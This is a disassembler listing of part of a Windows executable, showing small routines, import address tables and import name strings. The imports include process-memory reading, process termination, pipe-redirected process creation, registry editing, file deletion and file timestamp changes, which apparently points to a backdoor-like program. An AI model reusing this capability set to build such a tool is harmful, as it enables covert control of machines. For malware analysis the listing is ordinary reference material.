mov dword ptr [esi], offset off_4112C4
test eax, eax
mov [esi+8], eax
jz short loc_410C1F
cmp [esp+4+arg_8], 0
jz short loc_410C1F
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_410C1F: ; CODE XREF: sub_410BF3+1D�j
; sub_410BF3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_410BF3 endp
; =============== S U B R O U T I N E =======================================
sub_410C25 proc near ; DATA XREF: seg001:off_4112C4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_410C6E
test [esp+4+arg_0], 1
jz short loc_410C3B
push esi
call sub_410ADC
pop ecx
loc_410C3B: ; CODE XREF: sub_410C25+D�j
mov eax, esi
pop esi
retn 4
sub_410C25 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4112C4
jz short loc_410C68
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_410C68: ; CODE XREF: seg000:00410C60�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_410C6E proc near ; CODE XREF: sub_410C25+3�p
; DATA XREF: seg001:004113CC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4112C4
test eax, eax
jz short loc_410C84
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_410C84: ; CODE XREF: sub_410C6E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_410C92
push esi
call ds:dword_4110B4 ; LocalFree
loc_410C92: ; CODE XREF: sub_410C6E+1B�j
pop esi
retn
sub_410C6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410C94 proc near ; CODE XREF: sub_4011C4+C1�p
; sub_4049B5+90�p ...
jmp ds:dword_4111D4
sub_410C94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410C9A proc near ; CODE XREF: sub_401B81+C9�p
; sub_402C11+101�p ...
jmp ds:dword_411118
sub_410C9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410CA0 proc near ; CODE XREF: sub_402230+B1�p
; sub_402230+1AB�p ...
jmp ds:dword_41111C
sub_410CA0 endp
; =============== S U B R O U T I N E =======================================
sub_410CA6 proc near ; DATA XREF: seg001:off_4112CC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_410CC8
test [esp+4+arg_0], 1
jz short loc_410CBC
push esi
call sub_410ADC
pop ecx
loc_410CBC: ; CODE XREF: sub_410CA6+D�j
mov eax, esi
pop esi
retn 4
sub_410CA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410CC2 proc near ; CODE XREF: sub_410BCF+1F�p
jmp ds:dword_411120
sub_410CC2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410CC8 proc near ; CODE XREF: sub_410CA6+3�p
jmp ds:dword_411124
sub_410CC8 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-14h]
jmp loc_40FCF3
; ---------------------------------------------------------------------------
loc_410CD8: ; DATA XREF: seg001:0041138C�o
lea ecx, [ebp-1Ch]
jmp loc_40FCF3
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp loc_40FCF3
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_40FCF3
; ---------------------------------------------------------------------------
loc_410CF0: ; DATA XREF: sub_40F54D�o
mov eax, offset dword_411360
jmp loc_410B30
; ---------------------------------------------------------------------------
align 400h
seg000 ends
; Section 2. (virtual address 00011000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00011000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg001 segment para public 'CODE' use32
assume cs:seg001
;org 411000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_411000 dd 77DD22EAh ; DATA XREF: sub_401000+55�r
; sub_4043B3+116�r ...
dword_411004 dd 77DD5C55h ; DATA XREF: sub_401000+B2�r
; sub_4047C0+91�r
dword_411008 dd 77DD7F3Eh ; DATA XREF: sub_401000+22�r
dword_41100C dd 77DD23D7h ; DATA XREF: sub_4043B3+14D�r
; sub_4058D7+20A�r ...
dword_411010 dd 77DD59F0h ; DATA XREF: sub_4047C0+83�r
dword_411014 dd 77DD590Bh ; DATA XREF: sub_4047C0+24�r
dword_411018 dd 77DDACABh ; DATA XREF: sub_4058D7+A4�r
dword_41101C dd 77DE042Eh ; DATA XREF: sub_40A9A3+59�r
dword_411020 dd 77DE03D2h ; DATA XREF: sub_40A9A3+1E�r
dword_411024 dd 77DDEBA2h ; DATA XREF: sub_40A9A3+18�r
dword_411028 dd 77DD189Ah ; DATA XREF: sub_401000+EB�r
; sub_4043B3+226�r ...
align 10h
dword_411030 dd 77E65F4Ch ; DATA XREF: sub_4058D7+B2�r
dword_411034 dd 77E7C657h ; DATA XREF: sub_4058D7+D6�r
; sub_4088FC+1D3�r ...
dword_411038 dd 77E7513Ch ; DATA XREF: sub_40587E+8�r
dword_41103C dd 77E705C5h ; DATA XREF: sub_40488C+3B�r
dword_411040 dd 77E74672h ; DATA XREF: sub_4047C0+6B�r
; sub_40F54D+4C7�r
dword_411044 dd 77E705B0h ; DATA XREF: sub_404715+18�r
dword_411048 dd 77E7A837h ; DATA XREF: sub_404715+30�r
; sub_4048CF+80�r ...
dword_41104C dd 77E73CE2h ; DATA XREF: sub_404715+67�r
dword_411050 dd 77E7011Ah ; DATA XREF: sub_404715+9D�r
dword_411054 dd 77E704FCh ; DATA XREF: sub_4045E4+16�r
; sub_404691+15�r ...
dword_411058 dd 77E77CCEh ; DATA XREF: sub_40311D+38�r
dword_41105C dd 77E805D8h ; DATA XREF: sub_402D7B+2�r
; sub_403E9B+12�r ...
dword_411060 dd 77E7A5FDh ; DATA XREF: sub_402D7B+F�r
; sub_403E9B+1F�r ...
dword_411064 dd 77E75CB5h ; DATA XREF: sub_40287C+190�r
; sub_404BC3+E6�r ...
dword_411068 dd 77E6BD13h ; DATA XREF: sub_402230+CC�r
; sub_4049B5+123�r
dword_41106C dd 77F5157Dh ; DATA XREF: sub_402230+DA�r
; sub_406B1B+8B�r ...
dword_411070 dd 77E79D8Ch ; DATA XREF: sub_4018A7+20�r
; sub_4048CF+BC�r ...
dword_411074 dd 77E6CBF9h ; DATA XREF: sub_401621+50�r
dword_411078 dd 77E7727Ah ; DATA XREF: sub_401621+64�r
dword_41107C dd 77E76C1Ah ; DATA XREF: sub_4058D7+2F�r
dword_411080 dd 77E79CE3h ; DATA XREF: sub_401621+BA�r
dword_411084 dd 77E61BB8h ; DATA XREF: sub_401621+11C�r
; sub_4049B5+1FC�r
dword_411088 dd 77EB7624h ; DATA XREF: sub_401621+193�r
dword_41108C dd 77E7FF65h ; DATA XREF: sub_401621+1B3�r
dword_411090 dd 77E78B82h ; DATA XREF: sub_401621+210�r
dword_411094 dd 77E79F93h ; DATA XREF: sub_4011C4+A5�r
; sub_40287C+151�r ...
dword_411098 dd 77E7A099h ; DATA XREF: sub_4011C4+AC�r
; sub_40287C+158�r ...
dword_41109C dd 77E706B7h ; DATA XREF: sub_4011C4+E5�r
; sub_403F1D+110�r ...
dword_4110A0 dd 77E61A54h ; DATA XREF: sub_4011C4+12D�r
; sub_404240+7C�r
dword_4110A4 dd 77E61BE6h ; DATA XREF: sub_4011C4+1F0�r
; sub_4011C4+299�r ...
dword_4110A8 dd 77E616B4h ; DATA XREF: sub_4011C4+22D�r
; sub_404317+2E�r
dword_4110AC dd 77E77963h ; DATA XREF: sub_4011C4+255�r
; sub_4011C4+274�r ...
dword_4110B0 dd 77E70396h ; DATA XREF: sub_40110A+15�r
; sub_4049B5:loc_404B47�r
dword_4110B4 dd 77E79A45h ; DATA XREF: sub_410C6E+1E�r
dword_4110B8 dd 77E73628h ; DATA XREF: sub_40110A+24�r
; sub_401985+30�r ...
dword_4110BC dd 77E7AC37h ; DATA XREF: sub_406E50+D0�r
dword_4110C0 dd 77E75090h ; DATA XREF: sub_408EC8+71�r
dword_4110C4 dd 77E74D76h ; DATA XREF: sub_408EC8+3D�r
dword_4110C8 dd 77E77797h ; DATA XREF: sub_408EC8+2C�r
dword_4110CC dd 77E686CCh ; DATA XREF: sub_406096+3E�r
; sub_406110+10F�r
dword_4110D0 dd 77E6C0E3h ; DATA XREF: sub_406096+15�r
; sub_406110+6C�r ...
dword_4110D4 dd 77E7751Ah ; DATA XREF: sub_406324:loc_406385�r
; sub_40639B:loc_4063FC�r ...
dword_4110D8 dd 77E6D75Bh ; DATA XREF: sub_406324+14�r
; sub_40639B+14�r ...
dword_4110DC dd 77E802FCh ; DATA XREF: sub_406324+A�r
; sub_40639B+A�r ...
dword_4110E0 dd 77E7176Ch ; DATA XREF: sub_4064A0+40�r
dword_4110E4 dd 77E75CEBh ; DATA XREF: sub_406868+6B�r
; sub_406868+F8�r
dword_4110E8 dd 77E79908h ; DATA XREF: sub_406AB6+26�r
dword_4110EC dd 77F7E21Fh ; DATA XREF: sub_406AE4+4�r
dword_4110F0 dd 77E80656h ; DATA XREF: sub_4011C4:loc_40124A�r
; sub_404317+14�r
dword_4110F4 dd 77F7E300h ; DATA XREF: sub_406AEF+4�r
dword_4110F8 dd 77E79C90h ; DATA XREF: sub_401621+A2�r
dword_4110FC dd 77E78C17h ; DATA XREF: seg000:00410580�r
dword_411100 dd 77E7C2C4h ; DATA XREF: seg000:004105E5�r
dword_411104 dd 77E73167h ; DATA XREF: sub_40F54D:loc_40F7F0�r
; sub_40F54D+320�r ...
dword_411108 dd 77E73BEFh ; DATA XREF: sub_40F54D+58D�r
dword_41110C dd 77E7AC5Eh ; DATA XREF: sub_40F11A+96�r
dword_411110 dd 77E76432h ; DATA XREF: sub_408F9D+1E2�r
; sub_40F54D+2C2�r ...
align 8
dword_411118 dd 77C1C055h ; DATA XREF: sub_410C9A�r
dword_41111C dd 77C423F5h ; DATA XREF: sub_410CA0�r
dword_411120 dd 77C219F5h ; DATA XREF: sub_410CC2�r
dword_411124 dd 77C20C5Bh ; DATA XREF: sub_410CC8�r
dword_411128 dd 77C21AD8h ; DATA XREF: seg000:loc_410B30�r
dword_41112C dd 77C1CF9Eh ; DATA XREF: sub_410B2A�r
dword_411130 dd 77C43790h ; DATA XREF: sub_410B24�r
dword_411134 dd 77C43CB2h ; DATA XREF: sub_410B1E�r
dword_411138 dd 77C43DBCh ; DATA XREF: sub_410B18�r
dword_41113C dd 77C41FA0h ; DATA XREF: sub_410820�r
dword_411140 dd 77C43150h ; DATA XREF: sub_410B12�r
dword_411144 dd 77C33FDEh ; DATA XREF: sub_410B0C�r
dword_411148 dd 77C33FC1h ; DATA XREF: sub_410B06�r
dword_41114C dd 77C3CE0Ch ; DATA XREF: sub_410B00�r
dword_411150 dd 77C42D60h ; DATA XREF: sub_410AFA�r
dword_411154 dd 77C1C6F3h ; DATA XREF: sub_410AF4�r
dword_411158 dd 77C435C0h ; DATA XREF: sub_410AEE�r
dword_41115C dd 77C3E5D9h ; DATA XREF: sub_410AE8�r
dword_411160 dd 77C28925h ; DATA XREF: sub_410AE2�r
dword_411164 dd 77C28933h ; DATA XREF: sub_410ADC�r
dword_411168 dd 77C3CCE7h ; DATA XREF: sub_410AD6�r
dword_41116C dd 77C37FEDh ; DATA XREF: sub_410AD0�r
dword_411170 dd 77C33EB0h ; DATA XREF: sub_410ACA�r
dword_411174 dd 77C4B940h ; DATA XREF: sub_410A10�r
dword_411178 dd 77C4B120h ; DATA XREF: sub_4109E8�r
dword_41117C dd 77C37ADCh ; DATA XREF: sub_4108EC�r
dword_411180 dd 77C2AC58h ; DATA XREF: sub_4108E6�r
dword_411184 dd 77C438C0h ; DATA XREF: sub_4108E0�r
dword_411188 dd 77C3C93Ch ; DATA XREF: sub_41089E�r
dword_41118C dd 77C43AB0h ; DATA XREF: sub_410898�r
dword_411190 dd 77C3E8C0h ; DATA XREF: sub_410892�r
dword_411194 dd 77C1BE00h ; DATA XREF: sub_41088C�r
dword_411198 dd 77C3E140h ; DATA XREF: sub_410886�r
dword_41119C dd 77C3DFB5h ; DATA XREF: sub_410880�r
dword_4111A0 dd 77C3BF06h ; DATA XREF: sub_41086E�r
dword_4111A4 dd 77C3D8F6h ; DATA XREF: sub_410868�r
dword_4111A8 dd 77C3E4B9h ; DATA XREF: sub_410862�r
dword_4111AC dd 77C3E303h ; DATA XREF: sub_41085C�r
dword_4111B0 dd 77C41FB0h ; DATA XREF: sub_410856�r
dword_4111B4 dd 77C43490h ; DATA XREF: sub_410850�r
dword_4111B8 dd 77C46553h ; DATA XREF: sub_41084A�r
dword_4111BC dd 77C3C813h ; DATA XREF: sub_410844�r
dword_4111C0 dd 77C43900h ; DATA XREF: sub_41083E�r
dword_4111C4 dd 77C42E10h ; DATA XREF: sub_410838�r
dword_4111C8 dd 77C2AA6Bh ; DATA XREF: sub_410832�r
dword_4111CC dd 77C2AC46h ; DATA XREF: sub_41082C�r
dword_4111D0 dd 77C43710h ; DATA XREF: sub_410826�r
dword_4111D4 dd 77C421A2h ; DATA XREF: sub_410C94�r
dd 0
dword_4111DC dd 7713BC68h ; DATA XREF: sub_410B6E+44�r
dd 0
dword_4111E4 dd 77428B97h ; DATA XREF: sub_4018D5+28�r
; sub_402230+50D�r ...
dd 0
dword_4111EC dd 77D4C96Ah ; DATA XREF: sub_4048CF+9F�r
; sub_406110+50�r ...
dword_4111F0 dd 77D5C13Ah ; DATA XREF: sub_40735A+DF�r
; sub_40FD00+4B�r
dword_4111F4 dd 77D4456Bh ; DATA XREF: sub_40735A+D8�r
dword_4111F8 dd 77D4BDCAh ; DATA XREF: sub_408EBA+7�r
dword_4111FC dd 77D4702Fh ; DATA XREF: sub_408EC8+5A�r
dword_411200 dd 77D79D1Ch ; DATA XREF: sub_40F54D+3E9�r
align 8
dword_411208 dd 71AB3E5Dh ; DATA XREF: sub_403AFB+8B�r
; sub_403BBB+B9�r ...
dword_41120C dd 71AB1B7Bh ; DATA XREF: sub_410B58�r
dword_411210 dd 71AB8629h ; DATA XREF: sub_403D27+6�r
; sub_40DA6E+110�r ...
dword_411214 dd 71AB1890h ; DATA XREF: sub_40371E+12D�r
; sub_4039D2+81�r ...
dword_411218 dd 71AB3F8Dh ; DATA XREF: sub_4035FB+B8�r
; sub_40D201+9D�r
dword_41121C dd 71AB3ECEh ; DATA XREF: sub_4035FB+C5�r
; sub_40D201+AA�r ...
dword_411220 dd 71AB1AF4h ; DATA XREF: sub_403D54+E�r
; sub_40735A+D58�r ...
dword_411224 dd 71ABF628h ; DATA XREF: sub_403495+1E�r
; sub_403536+1E�r
dword_411228 dd 71AB155Ah ; DATA XREF: sub_403402+1A�r
; sub_403424+F�r
dword_41122C dd 71AB3C22h ; DATA XREF: sub_40331D+7�r
; sub_4035FB+83�r ...
dword_411230 dd 71AB401Ch ; DATA XREF: sub_402C11+4F�r
; sub_404D33+154�r ...
dword_411234 dd 71ABD755h ; DATA XREF: sub_402C11+86�r
; sub_406BE0+1A4�r
dword_411238 dd 71AB1740h ; DATA XREF: sub_402C11:loc_402CD9�r
; sub_403AFB+96�r ...
dword_41123C dd 71AB868Dh ; DATA XREF: sub_40371E+89�r
; sub_40371E+1A3�r
dword_411240 dd 71AB1A6Dh ; DATA XREF: sub_403D49+4�r
; sub_40735A+D5F�r ...
dword_411244 dd 71AB350Dh ; DATA XREF: sub_402A12+38�r
; sub_402A12+12E�r ...
dword_411248 dd 71AB1746h ; DATA XREF: sub_402A12+91�r
; sub_402A12+168�r ...
dword_41124C dd 71AB2BBFh ; DATA XREF: sub_402A12+E8�r
; sub_406BE0+CB�r ...
dword_411250 dd 71AB157Eh ; DATA XREF: sub_401B81+7D�r
; sub_403443+1E�r ...
dword_411254 dd 71AB12F8h ; DATA XREF: sub_401B81+163�r
; sub_406BE0+B6�r ...
dword_411258 dd 71AB5690h ; DATA XREF: sub_401985+CF�r
; sub_403D69+1A�r ...
dword_41125C dd 71AB12A7h ; DATA XREF: sub_401985+FE�r
; sub_401B81+16A�r
dword_411260 dd 71AB1836h ; DATA XREF: sub_4049B5+202�r
; sub_404BC3+DF�r ...
dword_411264 dd 71AB1444h ; DATA XREF: sub_40D201+19A�r
dword_411268 dd 71AB1ED3h ; DATA XREF: sub_40D201+121�r
dword_41126C dd 71AB14DCh ; DATA XREF: sub_40FFBC+D8�r
dword_411270 dd 71AB32CAh ; DATA XREF: sub_40FFBC+6B�r
dword_411274 dd 71AB41DAh ; DATA XREF: seg000:004106F5�r
dword_411278 dd 71AB5DE2h ; DATA XREF: sub_4035FB+D3�r
align 10h
flt_411280 dd 1.0e-3 ; DATA XREF: sub_401985+18E�r
; sub_401985+1B0�r ...
flt_411284 dd 9.765625e-4 ; DATA XREF: sub_405E4E+1A6�r
dword_411288 dd 0FFFFFFFFh, 406511h, 406527h, 0 ; DATA XREF: sub_4064A0+5�o
dword_411298 dd 0FFFFFFFFh, 40660Ah, 406622h, 0 ; DATA XREF: sub_406596+5�o
dword_4112A8 dd 0FFFFFFFFh, 4107DBh, 4107F1h, 0 ; DATA XREF: seg000:00410554�o
dd offset loc_4107A7
dd offset loc_4107BD
dd offset dword_411300
off_4112C4 dd offset sub_410C25 ; DATA XREF: sub_410BF3+12�o
; seg000:00410C5A�o ...
dd offset dword_411348
off_4112CC dd offset sub_410CA6 ; DATA XREF: .data:off_417B10�o
; .data:off_417B30�o
off_4112D0 dd offset off_417B10 ; DATA XREF: seg001:004112E8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4112D0
dword_4112EC dd 3 dup(0) ; DATA XREF: seg001:00411310�o
dd 1, 4112E8h
dword_411300 dd 3 dup(0) ; DATA XREF: seg001:004112C0�o
dd offset off_417B10
dd offset dword_4112EC+4
align 8
off_411318 dd offset off_417B30 ; DATA XREF: seg001:00411330�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_411318
dd 0
db 0 ; DATA XREF: seg001:00411358�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 411330h
dword_411348 dd 3 dup(0) ; DATA XREF: seg001:004112C8�o
dd offset off_417B30
dd offset unk_411338
align 10h
dword_411360 dd 19930520h, 4, 411380h, 5 dup(0) ; DATA XREF: seg000:loc_410CF0�o
dd 0FFFFFFFFh, 410CD0h, 0
dd offset loc_410CD8
dd 1, 410CE0h, 2, 410CE8h, 0
dd offset off_417B10
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 410C41h, 0
dword_4113C0 dd 1, 4113A0h ; DATA XREF: seg001:004113D4�o
dword_4113C8 dd 0 ; DATA XREF: sub_410BCF+19�o
dd offset sub_410C6E
dd 0
dd offset dword_4113C0
db 90h
db 15h, 1, 0
dd 2 dup(0)
dd 118C0h, 11118h, 11680h, 2 dup(0)
dd 118D8h, 11208h, 114A8h, 2 dup(0)
dd 11CD0h, 11030h, 11664h, 2 dup(0)
dd 11D46h, 111ECh, 11478h, 2 dup(0)
dd 11E1Ah, 11000h, 1165Ch, 2 dup(0)
dd 11E38h, 111E4h, 11654h, 2 dup(0)
dd 11E9Eh, 111DCh, 5 dup(0)
dd 11D72h, 11D60h, 11D82h, 11D92h, 11DA6h, 11DB8h, 11DCAh
dd 11DDAh, 11DF0h, 11E02h, 11D52h, 0
dd 11B26h, 11B16h, 11B04h, 11AECh, 11AE0h, 11AC8h, 11ABAh
dd 11AACh, 11A9Eh, 11A88h, 11A72h, 11A62h, 11A50h, 11A42h
dd 11A36h, 11A26h, 11A1Ah, 11A0Ch, 119FEh, 11B3Ah, 119D8h
dd 119C6h, 119B6h, 119A0h, 11994h, 1196Ah, 11954h, 11946h
dd 11932h, 1192Ah, 11916h, 11908h, 118F2h, 11E92h, 118E4h
dd 11C2Ah, 11C3Ah, 11C4Ch, 11C5Ch, 11B50h, 11B66h, 11B76h
dd 11B86h, 11BA2h, 11BBCh, 11BCCh, 11BDEh, 11BFAh, 1197Eh
dd 11C12h, 119EAh, 11CC0h, 11CB0h, 11CA4h, 11C98h, 11C7Eh
dd 11C72h, 0
dd 11E50h, 11E58h, 11E64h, 11E7Ah, 118ACh, 118A0h, 11896h
dd 1188Ch, 11882h, 116F8h, 11878h, 11870h, 11868h, 1185Ah
dd 11850h, 11846h, 1183Ch, 11832h, 11822h, 11812h, 11806h
dd 117F4h, 117E0h, 117D8h, 117D0h, 117C8h, 117BEh, 117B4h
dd 117A8h, 1179Eh, 11794h, 1178Ch, 11784h, 1177Ch, 11774h
dd 1176Ah, 11760h, 11758h, 1174Eh, 11744h, 1173Ch, 11732h
dd 11728h, 1171Eh, 11716h, 1170Ch, 11702h, 11E44h, 0
dd 800000C8h, 0
dd 11E28h, 0
dd 11CDEh, 11CEAh, 11CFCh, 11D12h, 11D20h, 11D30h, 0
dd 80000004h, 80000097h, 80000016h, 80000012h, 80000015h
dd 80000002h, 80000013h, 80000005h, 8000000Ah, 80000017h
dd 8000000Ch, 80000033h, 8000006Fh, 80000001h, 80000003h
dd 80000070h, 80000009h, 80000034h, 80000006h, 8000000Bh
dd 80000010h, 80000008h, 80000074h, 80000011h, 80000014h
dd 118CCh, 80000039h, 80000073h, 8000000Dh, 0
db 0BAh ; º
db 2, 73h, 74h
aRcpy db 'rcpy',0
align 2
dw 2BEh
aStrlen db 'strlen',0
align 4
db 91h ; ‘
db 2, 6Dh, 61h
aLloc db 'lloc',0
align 2
dw 25Eh
aFree db 'free',0
align 2
dw 297h
aMemcpy db 'memcpy',0
align 4
db 0C1h ; Á
db 2, 73h, 74h
aRncpy db 'rncpy',0
dw 2B2h
aSprintf db 'sprintf',0
db 43h ; C
db 2, 63h, 6Ch
db 6Fh ; o
db 63h, 6Bh, 0
db 99h ; ™
db 2, 6Dh, 65h
aMset db 'mset',0
align 2
dw 2B6h
aStrcat db 'strcat',0
align 4
db 64h ; d
db 2, 66h, 74h
db 65h ; e
db 2 dup(6Ch), 0
db 66h ; f
db 2, 66h, 77h
aRite db 'rite',0
align 2
dw 24Ch
aFclose db 'fclose',0
align 4
db 57h ; W
db 2, 66h, 6Fh
db 70h ; p
db 65h, 6Eh, 0
db 5Dh ; ]
db 2, 66h, 72h
db 65h ; e
db 61h, 64h, 0
db 62h ; b
db 2, 66h, 73h
db 65h ; e
db 65h, 6Bh, 0
db 3Dh ; =
db 2, 61h, 74h
db 6Fh ; o
db 69h, 2 dup(0)
db 0B5h ; µ
db 2, 2 dup(73h)
aCanf db 'canf',0
align 2
dw 2C5h
aStrstr db 'strstr',0
align 4
db 0AEh ; ®
db 1, 5Fh, 73h
aNprintf db 'nprintf',0
db 0C0h ; À
db 2, 73h, 74h
aRncmp db 'rncmp',0
dw 2A7h
aRealloc db 'realloc',0
db 49h ; I
db 2, 65h, 78h
db 69h ; i
db 74h, 2 dup(0)
db 0F1h ; ñ
align 2
a_ftol db '_ftol',0
db 41h ; A
db 2, 63h, 65h
db 69h ; i
db 6Ch, 2 dup(0)
; ---------------------------------------------------------------------------
retf 5F00h
; ---------------------------------------------------------------------------
aExcept_handler db 'except_handler3',0
align 4
aJ db '¦',0
a_beginthreadex db '_beginthreadex',0
align 2
dw 2DCh
aVsprintf db 'vsprintf',0
align 2
dw 10h
db 3Fh ; ?
db 3Fh, 33h, 40h
db 59h ; Y
db 41h, 58h, 50h
db 41h ; A
db 58h, 40h, 5Ah
db 0
align 2
dw 0Fh
db 3Fh ; ?
db 3Fh, 32h, 40h
db 59h ; Y
db 41h, 50h, 41h
db 58h ; X
db 49h, 40h, 5Ah
db 0
align 2
dw 29Eh
aPrintf db 'printf',0
align 4
db 0B8h ; ¸
db 2, 73h, 74h
aRcmp db 'rcmp',0
align 2
dw 2D3h
aTolower db 'tolower',0
db 96h ; –
db 2, 6Dh, 65h
aMcmp db 'mcmp',0
align 2
dw 1E1h
a_vsnprintf db '_vsnprintf',0
align 4
db 9Bh ; ›
db 1, 5Fh, 72h
db 6Fh ; o
db 74h, 6Ch, 0
db 9Ch ; œ
db 1, 5Fh, 72h
db 6Fh ; o
db 74h, 72h, 0
db 98h ; ˜
db 2, 6Dh, 65h
aMmove db 'mmove',0
dw 2E6h
aWcslen db 'wcslen',0
align 4
db 0E3h ; ã
db 2, 77h, 63h
aScpy db 'scpy',0
align 2
dw 2BFh
aStrncat db 'strncat',0
db 93h ; “
db 2, 6Dh, 62h
aStowcs db 'stowcs',0
align 4
aI db 'I',0
a__cxxframehand db '__CxxFrameHandler',0
aMsvcrt_dll db 'MSVCRT.dll',0
align 4
db '(',0
aWsaioctl db 'WSAIoctl',0
align 4
aWs2_32_dll_0 db 'WS2_32.dll',0
align 4
db '|',0
aDeletefilea db 'DeleteFileA',0
dw 30Eh
aSetfileattribu db 'SetFileAttributesA',0
align 4
a__0 db '.',0
aClosehandle db 'CloseHandle',0
dw 351h
aTerminateproce db 'TerminateProcess',0
align 2
dw 349h
aSleep db 'Sleep',0
dw 2AEh
aReadprocessmem db 'ReadProcessMemory',0
dw 27Ch
aOpenprocess db 'OpenProcess',0
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 177h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 13Bh
aGetcurrentproc db 'GetCurrentProcessId',0
db 0ABh ; «
db 2, 52h, 65h
aAdfile db 'adFile',0
align 10h
db 52h ; R
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 287h
aPeeknamedpipe db 'PeekNamedPipe',0
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 4
aM db 'Œ',0
aDuplicatehandl db 'DuplicateHandle',0
dw 13Ah
aGetcurrentpr_0 db 'GetCurrentProcess',0
a__1 db '_',0
aCreatepipe db 'CreatePipe',0
align 4
dd 655302D0h, 68637261h, 68746150h, 3970041h, 74697257h
dd 6C694665h, 1690065h, 4C746547h, 45747361h, 726F7272h
dd 3D0000h, 79706F43h, 656C6946h, 0AF0041h, 74697845h
dd 636F7250h, 737365h, 65470198h, 6F725074h, 64644163h
dd 73736572h, 2480000h, 64616F4Ch, 7262694Ch, 41797261h
dd 26B0000h
aMultibytetowid db 'MultiByteToWideChar',0
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 314h
aSetfiletime db 'SetFileTime',0
db 5Dh ; ]
db 1, 47h, 65h
aTfiletime db 'tFileTime',0
aM_0 db 'M',0
aCreatefilea db 'CreateFileA',0
db 0E9h ; é
db 1, 47h, 65h
aTwindowsdirect db 'tWindowsDirectoryA',0
align 10h
db 0BFh ; ¿
db 3, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
db 0FFh
db 2, 53h, 65h
aTcurrentdirect db 'tCurrentDirectoryA',0
align 4
dd 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh, 1DF0000h
dd 56746547h, 69737265h, 78456E6Fh, 10C0041h, 43746547h
dd 75706D6Fh, 4E726574h, 41656D61h, 1FA0000h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
db 46h ; F
db 1, 47h, 65h
aTdiskfreespace db 'tDiskFreeSpaceExA',0
dw 14Bh
aGetdrivetypea db 'GetDriveTypeA',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 29Ah
aQueryperforman db 'QueryPerformanceFrequency',0
dw 299h
aQueryperform_0 db 'QueryPerformanceCounter',0
dd 73490226h, 43646142h, 5065646Fh, 7274h, 65540352h, 6E696D72h
dd 54657461h, 61657268h, 2190064h
aInitializecr_0 db 'InitializeCriticalSection',0
aP db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 247h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aI_0 db 'i',0
aCreatethread db 'CreateThread',0
align 2
dw 365h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 5Eh ; ^
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aN db 'N',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 3B3h
aLstrcmpa db 'lstrcmpA',0
align 2
dw 150h
aGetenvironment db 'GetEnvironmentVariableA',0
db 0BCh ; ¼
db 3, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 0B9h ; ¹
db 3, 6Ch, 73h
aTrcpya db 'trcpyA',0
align 10h
aZ db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 10h
db 0Ah
db 3, 53h, 65h
aTerrormode db 'tErrorMode',0
align 10h
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
dw 2D5h
aWsprintfa db 'wsprintfA',0
dw 177h
aGetwindowtexta db 'GetWindowTextA',0
align 4
db 17h
db 1, 47h, 65h
aTforegroundwin db 'tForegroundWindow',0
aU db 'ã',0
aFindwindowa db 'FindWindowA',0
db 3Ah ; :
db 2, 53h, 65h
aNdmessagea db 'ndMessageA',0
align 10h
db 97h ; —
db 1, 49h, 73h
aCharalphanumer db 'CharAlphaNumericA',0
aUser32_dll db 'USER32.dll',0
align 2
dw 1C9h
aRegclosekey db 'RegCloseKey',0
dd 655201D2h, 6C654467h, 56657465h, 65756C61h, 1E20041h
dd 4F676552h, 4B6E6570h, 78457965h, 1D90041h, 45676552h
dd 566D756Eh, 65756C61h, 1EC0041h, 51676552h, 79726575h
dd 756C6156h, 41784565h, 1F90000h, 53676552h, 61567465h
dd 4565756Ch, 4178h, 655201CDh, 65724367h, 4B657461h, 78457965h
dd 1230041h, 55746547h, 4E726573h, 41656D61h, 0A00000h
aCryptreleaseco db 'CryptReleaseContext',0
aC db '–',0
